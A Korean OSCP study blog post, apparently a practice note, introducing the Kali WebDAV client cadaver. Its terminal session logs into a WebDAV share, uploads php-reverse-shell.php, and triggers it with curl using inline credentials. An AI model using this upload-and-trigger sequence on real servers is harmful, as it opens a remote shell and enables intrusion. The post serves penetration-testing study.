cadaver?

 

 

Kali Linux Tools 공식 페이지에 따르면

cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking.

Its operation is similar to the standard BSD ftp(1) client and the Samba Project’s smbclient(1).

This package includes GnuTLS (HTTPS) support.

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.

 

 

이라고 되어있고

WebDav 관련 문제를 풀 때

유용하게 사용된다.

┌──(kali㉿kali)-[~]
└─$ cadaver http://takudaddy.net/webdav/
Authentication required for Restricted Content on server `takudaddy.net':
Username: takudaddy
Password: 
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        password.dav                            51  Mar 20 16:17
dav:/webdav/> 
dav:/webdav/> put php-reverse-shell.php
Uploading php-reverse-shell.php to `/webdav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5496 bytes succeeded.
dav:/webdav/> 


===========================================
┌──(kali㉿kali)-[~]
└─$ curl http://takudaddy.net/webdav/php-reverse-shell.php -u takudaddy:Genius44
 
 

 

물론 페이지에 직접 접근하거나

curl 명령어로 문제를 해결해나가면

되기 때문에 몰라도 그만이지만

 

때론 아는 것이 힘이기에

정리해 본다.

 

 

728x90
반응형

'OSCP > OSCP 공부일지' 카테고리의 다른 글

AD 공략 ver.3  (2) 2022.09.10
Rustbuster 소개 (Fuzzer)  (0) 2022.06.21
Rustscan 소개  (0) 2022.05.21
OSCP Mindset  (5) 2022.05.15
LFI 작업용 코드  (2) 2022.01.17

+ Recent posts